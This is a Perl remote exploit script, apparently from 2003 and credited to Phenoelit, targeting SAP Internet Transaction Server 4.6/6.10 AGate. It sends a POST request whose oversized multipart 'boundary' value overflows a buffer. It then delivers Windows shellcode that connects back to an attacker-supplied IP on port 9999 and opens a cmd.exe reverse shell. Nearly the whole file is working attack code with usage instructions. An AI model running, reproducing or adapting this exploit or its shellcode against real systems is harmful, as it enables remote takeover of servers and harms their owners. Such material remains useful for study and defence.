#!/usr/bin/perl -w
use IO::Socket;

#
# SAP Internet Transaction Server 4.6/6.10 AGate remote exploit
# - buffer overflow in ASCII handling of "boundary" tag in HTTP POST
#
# FX of Phenoelit <fx@phenoelit.de>
# Dec 2003
#

if ($#ARGV != 2) {
	print "Usage: $0 <target_ip> <target_port> <back_connect_ip>\n";
	exit 1;
} else {
	($host,$port,$myself)=@ARGV;
}

print 	"        * * *  SAP ITS AGate 4.6/6.1 remote  * * *\n".
	" --==]] Phenoelit - http://www.phenoelit.de/whatSAP/ [[==--\n".
	"                       by FX - 2003\n\n";


$|=1;
$loginstr="/scripts/wgate/systeminfo/!?";
$t="A"x263;
$t.="\xB8\x23\x0E\x0E";		# call EDI (at 0x010023B8)
				# Trick: 0x0E get's cut off and replaced by the final
				#        0x00 character of the string, which we need
				# Universal Address for 
				# W2K Srv En SP2 / ITS 6.10
				# W2K Srv En SP4 / ITS 6.10
				# W2K Srv De SP0 / ITS 6.10
				# W2k Srv En SP2 / ITS 4.60

$myself=~/([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/;
$conback=sprintf("%c%c%c%c",$1,$2,$3,$4);
printf("Connecting back to %d.%d.%d.%d:9999\n",$1,$2,$3,$4);

$cont=
"\xeb\x25\x27\x0f".$conback."\x02\x06\x6c\x59\x6c\x59\xf8\x1d".
"\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32".
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed\x2c".
"\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x78\x08".
"\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x4b\x1c\x01".
"\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20\x01\xfb\x31\xc9".
"\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31\xc2\xd1\xe2\x84\xc0".
"\x75\xf7\x0f\xb6\x45\x09\x8d\x44\x45\x08\x66\x39\x10\x75\xe1\x66".
"\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a".
"\x8b\x04\x88\x01\xf8\x0f\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09".
"\x75\xbe\xfe\x4d\x08\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0".
"\x89\xc7\x6a\x02\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce".
"\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66".
"\x89\x30\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8".
"\x55\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65".
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53".
"\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1".
"\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a".
"\xff\xff\x55\xe4".
"Funny as it is, the shellcode needs to be longer ;-)".
"";

$request = "POST ".$loginstr." HTTP/1.0\r\n".
  "Host: ".$host."\r\n".
  "Accept: text/html, text/plain, application/pdf, image/*, image/jpeg, text/sgml, video/mpeg, image/jpeg, image/tiff, image/x-rgb, image/png, image/x-xbitmap, image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
  "Accept-Encoding: gzip, compress\r\n".
  "Accept-Language: en\r\n".
  "Pragma: no-cache\r\n".
  "Cache-Control: no-cache\r\n".
  "User-Agent: Stasi\r\n".
  "Referer: http://www.phenoelit.de/owns/your/SAP/now\r\n".
  "Content-type: multipart/form-data; ".
  	"boundary=---------------------------".$t."\r\n".
  "Content-length: ".length($cont)."\r\n\r\n".
  $cont;

  print "Sending request - Size ",length($request),"\n";
  &send_request_1();

  exit 0;

############################################

sub send_request_1 {
    my $remote;
    my $rline;

    $remote =
      IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port,);

    unless ($remote) { die "cannot connect to http daemon on $host" }

    $remote->autoflush(1);
    print $remote $request;

    while ( $rline=<$remote> ) { 
	print $rline;
    }

    close $remote;
}